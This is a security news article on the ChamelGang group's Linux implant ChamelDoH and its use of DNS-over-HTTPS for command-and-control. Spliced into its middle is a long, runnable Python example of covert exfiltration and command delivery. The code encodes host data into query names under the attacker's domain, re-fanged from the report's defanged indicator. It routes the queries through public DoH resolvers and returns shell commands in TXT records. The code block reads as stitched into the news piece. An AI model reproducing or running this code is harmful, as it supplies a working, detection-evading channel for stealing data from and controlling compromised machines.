Chinese-Affiliated Hacker Group ChamelGang Exploits DNS-Over-HTTPS Communications

Posted on June 15, 2023 at 6:30 AM


ChamelGang, a Chinese-affiliated threat actor, has been found infecting Linux devices with a previously unknown implant dubbed “ChamelDoH”. The implant talks to the attackers' servers over DNS-over-HTTPS (DoH).

Chinese hackers exploit DNS-over-HTTPS communications

The threat actor was first documented in September 2021 by Positive Technologies. That research, however, focused solely on the group's Windows toolkit, and its Linux tooling went unnoticed.

Stairwell has published a report on the activity that describes a new Linux implant written in C++. It expands the group's known intrusion arsenal and lists the indicators of compromise the attackers use.

The attribution of the new Linux malware to ChamelGang rests on a domain previously linked to the group and on a custom privilege-escalation tool that Positive Technologies had observed in earlier ChamelGang campaigns.

Hackers exploited DNS-over-HTTPS for malware communication

The Domain Name System (DNS) is used by software and operating systems to resolve human-readable hostnames to IP addresses, which are then used to set up network connections.

Traditional DNS queries travel unencrypted, in plain text, so internet service providers (ISPs), organizations and anyone else on the path can observe which names a device looks up.

Unencrypted DNS is widely regarded as a privacy risk and gives governments a convenient point at which to censor the Internet. DNS-over-HTTPS (DoH) was created to address this by carrying DNS queries inside encrypted HTTPS connections, so that on-path observers cannot read them.

That encryption is a double-edged sword: malware can use the same channel, and because the queries are hidden from the network, security tooling that relies on inspecting DNS traffic cannot see the malicious lookups.

In ChamelDoH's case, DoH encrypts the traffic between the infected device and the command-and-control (C2) server, and the malicious queries are indistinguishable from ordinary HTTPS traffic.

DoH also lets the implant bypass the local DNS resolver entirely by sending its queries to any DoH-capable server. ChamelDoH's requests go through legitimate DoH servers operated by Cloudflare and Google, which makes blocking them impractical: doing so would also break legitimate traffic.

ChamelDoH's JSON configuration contains two keys, “ns_record” and “doh”, which supply the C2 hostnames and the list of legitimate DoH providers the implant can route its queries through.

The malware's communications are encrypted with AES-128 and then encoded with a modified base64 alphabet in which the non-alphanumeric characters are substituted. The resulting text is embedded as hostnames under the attackers' C2 domain.

This lets the malware issue TXT requests for names that carry the encoded C2 communication, disguising the nature of the requests and lowering the chance that the activity is detected.

According to Bleeping Computer, when the malware queries a TXT record it sends a DoH request for a name of the form <encoded_data>.ns2.spezialsec[.]com. The malicious name server authoritative for that domain extracts and decrypts the encoded portion, receiving the exfiltrated data from the infected device.

The C2 server answers the query with an encoded TXT record containing the commands the malware should run on the infected device. On execution, the malware first collects basic host data such as the hostname, IP address, CPU architecture and system version and uses it to build a unique identifier for the machine.
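The exchange described above, modelled end to end as an added example (this is illustrative code written for this article, not ChamelDoH's code or Stairwell's). It shows how data is encoded into DNS labels under the C2 zone, what the resulting DoH request to a public resolver looks like, how the authoritative name server recovers the data, and how a command comes back in a TXT record. Assumptions: the zone apex is taken from the report's defanged IOC and re-fanged as ns2.spezialsec.com; the resolver URLs are the public DoH JSON endpoints of Cloudflare and Google (not from the page); the "altered base64" is stood in for by RFC 4648 base64url, since the page gives no substitution table; the AES-128 layer is left out, so only the encoding and DNS/DoH framing are shown; the beacon and command strings are constructed samples.

```python
"""Encode data into DNS labels, frame it as a DoH TXT query, decode it on the C2 side.

Added example, not ChamelDoH's code. The AES-128 layer described in the
report is deliberately left out; this models only the encoding and the
DNS/DoH framing around it.
"""
import base64
from typing import Dict, Tuple
from urllib.parse import urlencode

# Zone apex assumed from the report's defanged IOC (ns2.spezialsec[.]com), re-fanged here.
C2_ZONE = "ns2.spezialsec.com"
# Public DoH "JSON API" front ends (provider URLs, not taken from the page).
DOH_JSON_ENDPOINTS = {
    "cloudflare": "https://cloudflare-dns.com/dns-query",
    "google": "https://dns.google/resolve",
}
MAX_LABEL_LEN = 63   # RFC 1035 limit per label
MAX_NAME_LEN = 253   # practical limit for a full presentation-format name


def dns_safe_encode(data: bytes) -> str:
    """Base64 with '+'/'/' swapped for '-'/'_' and padding dropped (RFC 4648 base64url).
    Assumed stand-in for the report's 'altered base64'; the page gives no substitution table."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def dns_safe_decode(text: str) -> bytes:
    """Inverse of dns_safe_encode: restore padding, then base64url-decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_qname(payload: bytes, zone: str = C2_ZONE) -> str:
    """Client side: split the encoded payload into <=63-char labels under the C2 zone."""
    enc = dns_safe_encode(payload)
    labels = [enc[i:i + MAX_LABEL_LEN] for i in range(0, len(enc), MAX_LABEL_LEN)]
    qname = ".".join(labels + [zone])
    if len(qname) > MAX_NAME_LEN:
        raise ValueError("payload does not fit in one query name; chunk it across queries")
    return qname


def build_doh_request(qname: str, provider: str = "cloudflare") -> Tuple[str, Dict[str, str]]:
    """GET form of a DoH JSON query for a TXT record. This URL, and nothing else,
    is what leaves the host, inside a TLS session to the public resolver."""
    url = DOH_JSON_ENDPOINTS[provider] + "?" + urlencode({"name": qname, "type": "TXT"})
    return url, {"accept": "application/dns-json"}


def server_extract(qname: str, zone: str = C2_ZONE) -> bytes:
    """Authoritative side: strip the zone, rejoin the labels, decode the payload."""
    suffix = "." + zone
    if not qname.lower().endswith(suffix):
        raise ValueError("query is not for our zone")
    return dns_safe_decode(qname[:-len(suffix)].replace(".", ""))


def server_txt_answer(qname: str, command: bytes) -> dict:
    """C2 reply shaped like a DoH JSON answer, with the command encoded in the TXT rdata."""
    return {
        "Status": 0,
        "Question": [{"name": qname, "type": 16}],
        "Answer": [{"name": qname, "type": 16, "TTL": 60,
                    "data": '"' + dns_safe_encode(command) + '"'}],
    }


def client_read_command(doh_answer: dict) -> bytes:
    """Implant side: pull the TXT string(s) out of the resolver's JSON and decode them."""
    txt = "".join(rr["data"] for rr in doh_answer["Answer"] if rr["type"] == 16)
    return dns_safe_decode(txt.replace('"', ""))


def round_trip(beacon: bytes, command: bytes) -> Tuple[str, bytes, bytes]:
    """Full exchange: host data out as a query name, command back in a TXT record.
    Returns (DoH URL the implant would fetch, data the C2 recovers, command the implant decodes)."""
    qname = build_qname(beacon)
    url, _headers = build_doh_request(qname)        # sent to the public resolver, inside TLS
    received = server_extract(qname)                # what the C2 name server recovers
    answer = server_txt_answer(qname, command)      # travels back through the same resolver
    return url, received, client_read_command(answer)


if __name__ == "__main__":
    sample_beacon = b"host=web01;arch=x86_64;os=Linux 5.15"   # constructed sample host data
    print(round_trip(sample_beacon, b"id; uname -a"))
```

Two practical caveats follow from the code. First, nothing in the query is visible to the local resolver or to DNS-inspecting network controls; the only network observable is a TLS connection to the DoH provider, which is exactly why blocking is the blunt choice the article describes. Second, base64 is case-sensitive while DNS names are not: any resolver or authoritative server that case-folds the name corrupts the payload, which is why DNS tunnels often prefer base32 or hex over base64.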

Stairwell's researchers found that ChamelDoH supports a range of commands its operators can issue remotely, delivered in the TXT records returned by the DNS-over-HTTPS requests.

Stairwell's analysis also notes that ChamelDoH was first uploaded to VirusTotal in December 2022; at the time of the report, none of the platform's antivirus engines flagged it as malicious.
